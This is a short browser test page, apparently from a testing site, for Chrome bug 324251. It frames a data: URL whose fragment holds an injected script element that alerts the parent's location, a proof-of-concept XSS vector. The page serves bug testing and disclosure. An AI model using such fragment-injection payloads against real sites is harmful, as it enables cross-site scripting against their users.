Location hash (a.k.a. fragment) spills into data URI content

Chrome Bug 324251 - https://code.google.com/p/chromium/issues/detail?id=324251

By
skeptic_fx 1 Seen 678 times
Tags
bug hash xss

Results

User Script (ENUM_FUNCTION)

					
/**
 * Browser test for the behaviour tracked as Chrome bug 324251: does the
 * fragment of a data: URL (everything after '#') end up being parsed as
 * content of the framed document?
 *
 * An iframe is pointed at a data:text/html URL whose body is a heading and
 * whose fragment holds a script element. The script element exists only in
 * the fragment, so an alert raised by it means the fragment was treated as
 * markup of the framed document.
 *
 * NOTE(review): the URL puts ';' where the data: URL syntax has ',' between
 * the media type and the data - presumably deliberate for this test vector;
 * confirm before "fixing" it.
 * NOTE(review): the inner script reads parent.window.location.href before
 * alert() is called. Where the framed data: document is cross-origin to its
 * parent that read may throw, so a missing inner alert does not by itself
 * show that the fragment was ignored - confirm how results are observed.
 *
 * @param {Array} data - enum data supplied by the harness; never read here.
 */
function test(data) {
  try {
    var heading = "<h1>Test123</h1>";
    // The element name is split across literals, presumably so this source can
    // sit inside an HTML page without terminating the host script element.
    var fragmentScript = "<scr" + "ipt>alert(parent.window.location.href)</scr" + "ipt>";
    var frameUrl = "data:text/html;" + heading + "#" + fragmentScript;

    var frame = document.createElement('iframe');
    frame.id = 'iFrameID';
    // Attach the load handler before assigning src so the load event is not missed.
    frame.onload = function () {
      alert('Loaded');
    };
    frame.src = frameUrl;
    document.body.appendChild(frame);
  } catch (err) {
    // Any failure while building or attaching the frame is reported to the
    // harness as a generic error; the exception detail is not forwarded.
    addResult('Some Error Occured :(');
  }
}

					
				

Enum Data (ENUM_FUNCTION)

					
// Enum data for the harness. test() never reads its argument, so this is
// presumably a single placeholder element that makes the test run once -
// confirm against the harness.
var data = [1];